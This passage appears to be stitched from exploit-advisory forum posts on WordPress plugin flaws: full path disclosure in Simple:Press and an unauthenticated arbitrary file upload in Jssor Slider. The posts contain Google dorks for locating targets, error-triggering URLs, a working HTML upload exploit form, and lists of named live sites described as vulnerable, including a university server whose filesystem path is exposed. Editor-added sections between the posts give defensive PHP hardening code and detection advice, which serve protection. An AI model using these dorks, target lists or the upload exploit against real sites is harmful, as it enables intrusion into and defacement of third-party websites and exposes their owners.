You can check here to fully understand the attack : owasp.org/index.php/Full_Path_Disclosure
#################################################################################################
# Google Dorks :
inurl:''/wp-content/plugins/simple-forum/editors/tinymce/''
intext:''proudly designed by dsquaredmedia.co.uk''
intext:''Website by NorthWorks''
intext:''Powered By WordPress | Voyage Theme''
intext:''Powered by WordPress & Mimbo Pro''
intext:''Web Site By dsixty''
intext:''© Mainostoimisto Underground Graphics 2012''
intext:''Grace Theme by Templatic''
intext:''développé avec WordPress pour la DREAL Auvergne''
intext:''Site designed by amesDesign''
intext:''Responsive Theme powered by WordPress''
#################################################################################################
Full Path Disclosure Vulnerabilities =>
# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
Error : {"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}
# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php
Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21
# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php
Error : Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362
# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php
Error : Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9
Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15
# Exploit : /wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9
# Exploit : /wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-admins/sfa-admins.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-config/sfa-config.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-forums/sfa-forums.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-integration/sfa-integration.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-options/sfa-options.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-permissions/sfa-permissions.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-profiles/sfa-profiles.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-tags/sfa-tags.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-usergroups/sfa-usergroups.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/sfa-framework.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-framework.php on line 10
# Exploit : /wp-content/plugins/simple-forum/admin/sfa-notice.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/sfa-notice.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-toolbox/sfa-toolbox.php on line 11
# Exploit : /wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php:11 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/admin/panel-users/sfa-users.php on line 11
# Exploit : /wp-content/plugins/simple-forum/sf-loader-admin.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/sf-loader-admin.php on line 10
# Exploit : /wp-content/plugins/simple-forum/template-tags/sf-widgets.php
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; WP_Widget_SPF has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/template-tags/sf-widgets.php on line 15
Access Denied
# Exploit : /wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/bbcode/sf-bbcodeinit.php on line 10
# Exploit : /wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/html/sf-htmlinit.php on line 10
Exploit : /wp-content/plugins/simple-forum/help/documentation/database-script.sql
Database: simple:press forum Version 4.2.2
Exploit : /wp-content/plugins/simple-forum/install/install-error.log
Simple Forum Installation Log Files
Exploit : /wp-content/plugins/simple-forum/install/sf-install.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-install.php on line 10
/wp-content/plugins/simple-forum/install/sf-upgrade.php
Fatal error: Uncaught Error: Call to undefined function __() in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php:10 Stack trace: #0 {main} thrown in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/install/sf-upgrade.php on line 10
It gives the same error :
/wp-login.php?action=login&view=forum
/wp-login.php?action=register&view=forum
/wp-login.php?action=lostpassword&view=forum
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/css/filemanager-tm.css.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-browse-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-edit-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-folder-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-tinymce.js.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/fm-upload-tab.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_file.php
/wp-content/plugins/simple-forum/editors/tinymce/plugins/filemanager/upload_process.php
Error : Your PHP installation appears to be missing the MySQL extension which is required by WordPress.
Found Templates by SimpleForum => /wp-content/plugins/simple-forum/editors/tinymce/plugins/inlinepopups/template.htm
#################################################################################################
# Example Site for Full Path Disclosure and SQL Injection Vulnerability =>
+ University of Washington - Departments Web Server Information Technology WebSite is Vulnerable.
Apache/2.2.32 (Unix) mod_ssl/2.2.32 OpenSSL/1.0.1e-fips mod_pubcookie/3.3.4a mod_uwa/3.2.1 Phusion_Passenger/3.0.11 Server at depts.washington.edu Port 80
depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php => [ Proof of Concept ] => archive.is/76tXR
Errors displaying on the page :
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_Logger has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php on line 21
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSONReader has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 26
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Moxiecode_JSON has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/JSON.php on line 362
Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 9
Warning: Use of undefined constant PSPELL_FAST - assumed 'PSPELL_FAST' (this will throw an Error in a future version of PHP) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/config.php on line 15
Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; SpellChecker has a deprecated constructor in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/SpellChecker.php on line 9
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 12
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 13
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 14
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 15
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 16
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 17
Warning: Cannot modify header information - headers already sent by (output started at /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/classes/utils/Logger.php:21) in /nfs/bronfs/uwfs/hw00/d84/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php on line 18
{"result":null,"id":null,"error":{"errstr":"Could not get raw post data.","errfile":"","errline":null,"errcontext":"","level":"FATAL"}}
#################################################################################################
Source [ My Topic ] => cyberizm.org/cyberizm-wordpress-simplepress-simpleforum-editors-tinymce-vuln.html
#################################################################################################
# Example Sites =>
depts.washington.edu/triolive/wordpress/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
blogs.uprm.edu/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
americanclublyon.org/site/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
ounasvaaranlatu.fi/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
alliancechristiancenter.org/development/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
churchoffrancisdesales.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
mudslingerevents.com/blog/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
preux-volley-ball.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
muenterprises.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
kjergaardsports.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
confemen.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
veda.com.ng/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
lisasee.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
soulographie.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
lunadanceinstitute.org/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
plaisance-port-leucate.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
shiatsu-angers.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
supremeroofing.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
automaxrecruitingandtraining.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
slulabservices.com/wp-content/plugins/simple-forum/editors/tinymce/plugins/spellchecker/rpc.php
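Every error in the post above is produced by the same mechanism: a plugin file is requested directly, WordPress never loads, and PHP prints its diagnostic (with the absolute path, and therefore the hosting layout and account name) into the HTTP response. The server-side control that stops all of them at once is to keep diagnostics out of responses. The following is an added example (editor's code, not from the post, from Simple:Press or from OWASP) of a file meant to be loaded through `auto_prepend_file`; the file path is an assumption. Because a prepended file runs before the requested script is compiled, it also catches the compile-time "Deprecated: Methods with the same name as their class ..." notices, which a guard inside the plugin file itself cannot prevent.

```php
<?php
// harden-errors.php: added example, not code from the forum post or from Simple:Press.
// Load it for every request, e.g. "auto_prepend_file=/srv/php/harden-errors.php"
// in .user.ini (php-fpm) or "php_value auto_prepend_file /srv/php/harden-errors.php"
// in .htaccess (mod_php). The /srv/php path is an assumption; use your own.
declare(strict_types=1);

// 1. Diagnostics go to the server log, never into the response body.
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
ini_set('html_errors', '0');
error_reporting(E_ALL);

// 2. Warnings, notices and deprecations: keep file and line for the operator,
//    send nothing to the client. Returning true suppresses PHP's own output.
set_error_handler(static function (int $errno, string $errstr, string $errfile, int $errline): bool {
    error_log(sprintf('php[%d] %s in %s:%d', $errno, $errstr, $errfile, $errline));
    return true;
});

// 3. Uncaught exceptions. In PHP 7+ "Call to undefined function __()" is a thrown
//    Error, so it lands here: log it with its location, answer with a generic 500.
set_exception_handler(static function (Throwable $e): void {
    error_log(sprintf('uncaught %s: %s in %s:%d', get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()));
    harden_errors_generic_response();
});

// 4. Fatal errors that bypass both handlers (parse/compile errors, exhausted memory):
//    error_get_last() still sees them from a shutdown function.
register_shutdown_function(static function (): void {
    $last = error_get_last();
    if ($last !== null && in_array($last['type'], [E_ERROR, E_PARSE, E_CORE_ERROR, E_COMPILE_ERROR], true)) {
        error_log(sprintf('fatal %s in %s:%d', $last['message'], $last['file'], $last['line']));
        harden_errors_generic_response();
    }
});

function harden_errors_generic_response(): void
{
    // Discard anything already buffered, so a half-rendered page carrying a
    // path or a stack trace never leaves the server.
    while (ob_get_level() > 0) {
        ob_end_clean();
    }
    if (!headers_sent()) {
        http_response_code(500);
        header('Content-Type: text/plain; charset=utf-8');
    }
    echo "An internal error occurred.\n";
}

// Buffer all output so the generic response above can replace partial output.
ob_start();
```

If only one thing is changed, make it `display_errors = Off` in php.ini; the handlers above add the logging that an operator still needs to find the broken include. Independently of this, plugin files that are only meant to be included by WordPress should start with `if ( ! defined( 'ABSPATH' ) ) { exit; }`, which turns the `Call to undefined function __()` responses into empty ones even on a host that still displays errors.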
  8. #################################################################################################
# Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/06/2018
# Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018060226
#####################################################################################################
Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features.
# Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins
#####################################################################################################
Affected Jssor Slider Plugin Code :
When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run:
That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded.
It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error.
The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/.
Make sure to replace “[path to WordPress]” with the location of WordPress.
public function register_ajax_calls() {
    if ( isset( $_REQUEST['action'] ) ) {
        switch ( $_REQUEST['action'] ) {
            case 'add_new_slider_library' :
                add_action( 'admin_init', 'jssor_slider_library' );
                function jssor_slider_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php';
                }
                break;
            case 'upload_library' :
                add_action( 'admin_init', 'upload_library' );
                function upload_library() {
                    include_once JSSOR_SLIDER_PATH . '/lib/upload.php';
                }
                break;
        }
    }
}
#####################################################################################################
# Google Dorks :
inurl:''/wp-content/jssor-slider/jssor-uploads/''
intext:''Managed by Web development company Ethic Solutions''
intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador''
intext:''Website Developed by DRC Systems''
#####################################################################################################
# PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
# Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"}
# Exploit Code :
<html>
<body>
<form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" >
<input type="file" name="file" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
# Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/.....
# Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other file extensions are allowed. For example html and txt and etcetera....
# Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1 ] localhost/jssorsliderexploiter.html
#################################################################################################
# Example All Vulnerable Sites =>
treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library
############################################################################
Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################
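The root cause in the `register_ajax_calls()` code quoted in the post is that the handler is hooked on `admin_init`, which admin-ajax.php fires for every visitor, and `upload.php` then checks neither who is asking nor what is being uploaded. The hardened form below is an added example written by the editor, not code from the post or from the Jssor Slider plugin; the function name, the nonce action `jssor_upload_library`, the field name `jssor_nonce` and the image-only allowlist are assumptions. It uses only core WordPress APIs: `wp_ajax_{action}` (authenticated callers only; no `wp_ajax_nopriv_` twin is registered), `current_user_can()`, `check_ajax_referer()`, `wp_check_filetype_and_ext()` and `wp_handle_upload()`.

```php
<?php
// Added example (not from the forum post or the Jssor Slider plugin): an
// upload_library AJAX handler that denies anonymous, unauthorized, forged and
// non-image requests before anything touches the filesystem.
if ( ! defined( 'ABSPATH' ) ) {
    exit; // a direct request to this file gets nothing, not even a PHP notice
}

// Only the authenticated hook is registered. Without a wp_ajax_nopriv_
// counterpart, admin-ajax.php never runs this for a logged-out visitor.
add_action( 'wp_ajax_upload_library', 'jssor_hardened_upload_library' );

function jssor_hardened_upload_library() {
    // 1. Authorization: the feature is for administrators, so require a
    //    capability, not merely "logged in" (subscribers are logged in too).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 2. CSRF: the admin page that renders the form must emit
    //    wp_nonce_field( 'jssor_upload_library', 'jssor_nonce' ) (assumed names).
    //    check_ajax_referer() dies with a 403 on a missing or stale nonce.
    check_ajax_referer( 'jssor_upload_library', 'jssor_nonce' );

    if ( empty( $_FILES['file'] ) || ! is_uploaded_file( $_FILES['file']['tmp_name'] ) ) {
        wp_send_json_error( array( 'message' => 'no file' ), 400 );
    }

    // 3. Allowlist what a slider legitimately needs. A denylist ("not php, not asp")
    //    is what let .html/.phtml/.php5 style names through in the post above.
    $allowed = array(
        'jpg|jpeg' => 'image/jpeg',
        'png'      => 'image/png',
        'gif'      => 'image/gif',
    );
    // Checks the real file content against the claimed name, not just the extension.
    $check = wp_check_filetype_and_ext( $_FILES['file']['tmp_name'], $_FILES['file']['name'], $allowed );
    if ( empty( $check['ext'] ) || empty( $check['type'] ) ) {
        wp_send_json_error( array( 'message' => 'file type not allowed' ), 415 );
    }

    // 4. Let core move the file: it sanitises the name, applies the same
    //    allowlist again and stores under wp-content/uploads, where the
    //    recommended server config blocks PHP execution.
    $result = wp_handle_upload(
        $_FILES['file'],
        array( 'test_form' => false, 'mimes' => $allowed )
    );
    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 500 );
    }

    wp_send_json_success( array( 'url' => esc_url_raw( $result['url'] ) ) );
}
```

On a site that cannot patch, the detection side is cheap: an access-log entry for `POST /wp-admin/admin-ajax.php?...action=upload_library` from a client with no WordPress login cookie, followed by a `GET` under `/wp-content/jssor-slider/jssor-uploads/`, is the exact sequence the proof of concept above produces and is worth an alert on its own.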
  9. #################################################################################################
# Exploit Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Hosting Provider Serious Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Team
# Date : 11/06/2018
# Vendor Homepages : rvsitebuilder.com ~ rvglobalsoft.com ~ ckeditor.com ~
+ dynarch.com/jscal/ ~ jquery.com ~ docs.s9y.org ~ seagullproject.org ~ seagullsystems.com
# Social Media Link : facebook.com/Rvglobalsoft/ ~ facebook.com/RVsitebuilder-331466346876534/
+ twitter.com/rvsitebuilder ~ twitter.com/rvglobalsoft_
# Version : All Versions
# Google Dork : inurl:''/rvsindex.php/''
# Tested On : Windows and Linux Operating Systems
# Category : WebApps
# Exploit Risk : Medium and High
# CWE : CWE-209 [ Information Exposure Through an Error Message ]
+ CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
+ CWE-264 [ Permissions, Privileges, and Access Controls ]
+ CWE-200 [ Information Exposure ]
+ CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
+ CWE-592 [ Authentication Bypass Issues ]
+ CWE-23 [ Relative Path Traversal ]
+ CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
+ CWE-36 [ Absolute Path Traversal ]
+ CWE-538 [ File and Directory Information Exposure ]
+ CWE-548 [ Information Exposure Through Directory Listing ]
# CxSecurity : cxsecurity.com/ascii/WLB-2018060101
#################################################################################################
# Title : RVSiteBuilder RVGlobalSoft CMS High-Performance Site Builder for WebHosts [ Hosting Provider ] 2018 Serious Multiple Vulnerabilities
